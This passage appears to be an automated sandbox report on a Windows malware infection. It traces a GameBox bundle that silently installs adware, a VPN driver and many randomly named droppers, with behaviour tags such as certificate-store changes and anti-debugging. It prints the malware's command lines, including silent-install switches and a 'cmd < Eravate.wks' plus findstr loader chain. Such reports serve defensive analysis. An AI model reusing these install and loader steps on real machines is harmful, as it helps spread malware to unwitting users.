C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5412 /prefetch:211⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:7044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4800 /prefetch:111⤵PID:5364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:111⤵PID:1704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:111⤵PID:5244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:111⤵PID:2832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:111⤵PID:6152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:111⤵PID:1152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6768 /prefetch:111⤵PID:2588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7024 /prefetch:111⤵PID:6540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1660 /prefetch:111⤵PID:6908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:111⤵PID:3540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7076 /prefetch:111⤵PID:2848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:111⤵PID:5880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6716 /prefetch:111⤵PID:472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7500 /prefetch:111⤵PID:2356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:111⤵PID:1660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7328 /prefetch:111⤵PID:5540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7120 /prefetch:111⤵PID:2392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7504 /prefetch:111⤵PID:3340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4536 /prefetch:111⤵PID:1412
-
-
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"9⤵
- Loads dropped DLL
PID:6708
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:4636 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629318074 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵PID:6596
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent5⤵PID:1388
-
C:\Users\Admin\AppData\Local\Temp\is-4DQHU.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-4DQHU.tmp\WEATHER Manager.tmp" /SL5="$70024,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4380 -
C:\Users\Admin\AppData\Local\Temp\is-N7C76.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-N7C76.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7157⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:1028 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-N7C76.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-N7C76.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629318074 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"8⤵PID:4788
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent5⤵
- Executes dropped EXE
PID:4900 -
C:\Users\Admin\AppData\Local\Temp\is-461I6.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-461I6.tmp\VPN.tmp" /SL5="$102E0,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:812 -
C:\Users\Admin\AppData\Local\Temp\is-36KQ8.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-36KQ8.tmp\Setup.exe" /silent /subid=7207⤵
- Executes dropped EXE
PID:1388 -
C:\Users\Admin\AppData\Local\Temp\is-0A8EK.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-0A8EK.tmp\Setup.tmp" /SL5="$3056E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-36KQ8.tmp\Setup.exe" /silent /subid=7208⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:2024 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "9⤵PID:5404
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090110⤵PID:5664
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "9⤵PID:6936
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090110⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:1384
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall9⤵
- Suspicious use of SendNotifyMessage
PID:4860
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install9⤵PID:5552
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:4124
-
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"5⤵PID:4796
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4796 -s 18766⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5720
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"5⤵
- Executes dropped EXE
PID:1912 -
C:\Users\Admin\AppData\Roaming\7015786.exe"C:\Users\Admin\AppData\Roaming\7015786.exe"6⤵
- Executes dropped EXE
PID:5548 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5548 -s 23367⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5296
-
-
-
C:\Users\Admin\AppData\Roaming\6906437.exe"C:\Users\Admin\AppData\Roaming\6906437.exe"6⤵PID:5960
-
-
C:\Users\Admin\AppData\Roaming\6434895.exe"C:\Users\Admin\AppData\Roaming\6434895.exe"6⤵PID:4564
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 24487⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6336
-
-
-
C:\Users\Admin\AppData\Roaming\3503923.exe"C:\Users\Admin\AppData\Roaming\3503923.exe"6⤵PID:3924
-
-
C:\Users\Admin\AppData\Roaming\6885585.exe"C:\Users\Admin\AppData\Roaming\6885585.exe"6⤵
- Suspicious behavior: SetClipboardViewer
PID:5748
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"5⤵PID:4904
-
C:\Users\Admin\Documents\xDav0SfARivRtWPczlYtE9Iw.exe"C:\Users\Admin\Documents\xDav0SfARivRtWPczlYtE9Iw.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5968
-
-
C:\Users\Admin\Documents\FaZ8_3dHeuauRdapJ3lEixDE.exe"C:\Users\Admin\Documents\FaZ8_3dHeuauRdapJ3lEixDE.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5984 -
C:\Users\Admin\Documents\FaZ8_3dHeuauRdapJ3lEixDE.exeC:\Users\Admin\Documents\FaZ8_3dHeuauRdapJ3lEixDE.exe7⤵PID:6264
-
-
C:\Users\Admin\Documents\FaZ8_3dHeuauRdapJ3lEixDE.exeC:\Users\Admin\Documents\FaZ8_3dHeuauRdapJ3lEixDE.exe7⤵PID:1284
-
-
C:\Users\Admin\Documents\FaZ8_3dHeuauRdapJ3lEixDE.exeC:\Users\Admin\Documents\FaZ8_3dHeuauRdapJ3lEixDE.exe7⤵PID:6616
-
-
-
C:\Users\Admin\Documents\oCIMgs8_ldXYAYqhGh84yGu1.exe"C:\Users\Admin\Documents\oCIMgs8_ldXYAYqhGh84yGu1.exe"6⤵
- Executes dropped EXE
PID:5888 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 3167⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5196
-
-
-
C:\Users\Admin\Documents\hjVOi2wTWJVrmXB1GOLuRmoA.exe"C:\Users\Admin\Documents\hjVOi2wTWJVrmXB1GOLuRmoA.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5340 -
C:\Users\Admin\Documents\hjVOi2wTWJVrmXB1GOLuRmoA.exeC:\Users\Admin\Documents\hjVOi2wTWJVrmXB1GOLuRmoA.exe7⤵PID:2208
-
-
-
C:\Users\Admin\Documents\417d57ydNzkYOL4wMFXAsDON.exe"C:\Users\Admin\Documents\417d57ydNzkYOL4wMFXAsDON.exe"6⤵
- Executes dropped EXE
PID:6116 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6116 -s 3207⤵
- Program crash
PID:6884
-
-
-
C:\Users\Admin\Documents\rXxYx6GIop9OrdkH8w6UZTdz.exe"C:\Users\Admin\Documents\rXxYx6GIop9OrdkH8w6UZTdz.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5936
-
-
C:\Users\Admin\Documents\wDzLzrtxKna7j1CvL6DokD8a.exe"C:\Users\Admin\Documents\wDzLzrtxKna7j1CvL6DokD8a.exe"6⤵
- Executes dropped EXE
PID:5344 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 2807⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6140
-
-
-
C:\Users\Admin\Documents\0PZCdaOFm6YACZSsTAbvdwzK.exe"C:\Users\Admin\Documents\0PZCdaOFm6YACZSsTAbvdwzK.exe"6⤵
- Executes dropped EXE
PID:404 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 404 -s 2367⤵
- Program crash
PID:2972
-
-
-
C:\Users\Admin\Documents\P_xKE8bZV36d4TGV80AfTK07.exe"C:\Users\Admin\Documents\P_xKE8bZV36d4TGV80AfTK07.exe"6⤵PID:4628
-
C:\Users\Admin\AppData\Local\Temp\is-AAMQN.tmp\P_xKE8bZV36d4TGV80AfTK07.tmp"C:\Users\Admin\AppData\Local\Temp\is-AAMQN.tmp\P_xKE8bZV36d4TGV80AfTK07.tmp" /SL5="$104B8,138429,56832,C:\Users\Admin\Documents\P_xKE8bZV36d4TGV80AfTK07.exe"7⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:3032 -
C:\Users\Admin\AppData\Local\Temp\is-G7ISI.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-G7ISI.tmp\Setup.exe" /Verysilent8⤵PID:6488
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"9⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:1760 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629318074 /qn CAMPAIGN=""710"" " CAMPAIGN="710"10⤵PID:3704
-
-
-
-
-
-
C:\Users\Admin\Documents\TEyKg6WWNaVU9EhyVkoeZtC8.exe"C:\Users\Admin\Documents\TEyKg6WWNaVU9EhyVkoeZtC8.exe"6⤵PID:3080
-
-
C:\Users\Admin\Documents\4AEMR5olCp_tVzrTVx6ANnLU.exe"C:\Users\Admin\Documents\4AEMR5olCp_tVzrTVx6ANnLU.exe"6⤵
- Suspicious use of SetThreadContext
PID:2264 -
C:\Users\Admin\Documents\4AEMR5olCp_tVzrTVx6ANnLU.exe"C:\Users\Admin\Documents\4AEMR5olCp_tVzrTVx6ANnLU.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1656
-
-
-
C:\Users\Admin\Documents\sNdqopuZ9Uk2ZToaLeMwRShT.exe"C:\Users\Admin\Documents\sNdqopuZ9Uk2ZToaLeMwRShT.exe"6⤵PID:5592
-
-
C:\Users\Admin\Documents\2zqdQKyNXHbGvLuM4VCa821c.exe"C:\Users\Admin\Documents\2zqdQKyNXHbGvLuM4VCa821c.exe"6⤵PID:1568
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3080
-
-
-
C:\Users\Admin\Documents\85wlggFKGozsyikLrq0qtAkw.exe"C:\Users\Admin\Documents\85wlggFKGozsyikLrq0qtAkw.exe"6⤵PID:4624
-
C:\Users\Admin\Documents\85wlggFKGozsyikLrq0qtAkw.exe"C:\Users\Admin\Documents\85wlggFKGozsyikLrq0qtAkw.exe" -q7⤵PID:6168
-
-
-
C:\Users\Admin\Documents\ZGAnqbcTm26VKZ7mYmPeq7lT.exe"C:\Users\Admin\Documents\ZGAnqbcTm26VKZ7mYmPeq7lT.exe"6⤵PID:3076
-
-
C:\Users\Admin\Documents\FHi5zyiq4wFZewawYIFuQaZa.exe"C:\Users\Admin\Documents\FHi5zyiq4wFZewawYIFuQaZa.exe"6⤵PID:2748
-
C:\Users\Admin\AppData\Roaming\1342398.exe"C:\Users\Admin\AppData\Roaming\1342398.exe"7⤵
- Suspicious behavior: SetClipboardViewer
PID:2860
-
-
C:\Users\Admin\AppData\Roaming\6995705.exe"C:\Users\Admin\AppData\Roaming\6995705.exe"7⤵PID:6872
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6872 -s 23168⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1120
-
-
-
C:\Users\Admin\AppData\Roaming\3183433.exe"C:\Users\Admin\AppData\Roaming\3183433.exe"7⤵PID:6608
-
-
C:\Users\Admin\AppData\Roaming\8287204.exe"C:\Users\Admin\AppData\Roaming\8287204.exe"7⤵PID:736
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 736 -s 24368⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4236
-
-
-
-
C:\Users\Admin\Documents\YeDbPq32epL6yc6AcDn041hI.exe"C:\Users\Admin\Documents\YeDbPq32epL6yc6AcDn041hI.exe"6⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6072
-
-
C:\Users\Admin\Documents\_l8YgX_rzu6d8PzbGyqdEPmr.exe"C:\Users\Admin\Documents\_l8YgX_rzu6d8PzbGyqdEPmr.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4924
-
-
C:\Users\Admin\Documents\VzpWxsUZh2Hr5rF18nxp8q4T.exe"C:\Users\Admin\Documents\VzpWxsUZh2Hr5rF18nxp8q4T.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5512
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"5⤵
- Executes dropped EXE
PID:660 -
C:\Users\Admin\AppData\Local\Temp\tmp8B78_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp8B78_tmp.exe"6⤵PID:1624
-
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"7⤵PID:7000
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks7⤵PID:6316
-
C:\Windows\SysWOW64\cmd.execmd8⤵PID:1356
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks9⤵PID:5352
-
-
C:\Windows\SysWOW64\PING.EXEping YJTUIPJF -n 309⤵
- Runs ping.exe
PID:3368
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comEsplorarne.exe.com i9⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7148 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i10⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6620 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i11⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SendNotifyMessage
PID:2972 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i12⤵PID:4860
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i13⤵
- Enumerates system info in registry
- Suspicious use of SendNotifyMessage
PID:3936 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i14⤵
- Suspicious use of SendNotifyMessage
PID:4484 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i15⤵PID:5056
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i16⤵
- Suspicious use of SendNotifyMessage
PID:4192 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i17⤵PID:5852
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i18⤵PID:6860
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i19⤵PID:5472
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i20⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2036 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i21⤵PID:2276
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i22⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5360 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i23⤵PID:7104
-
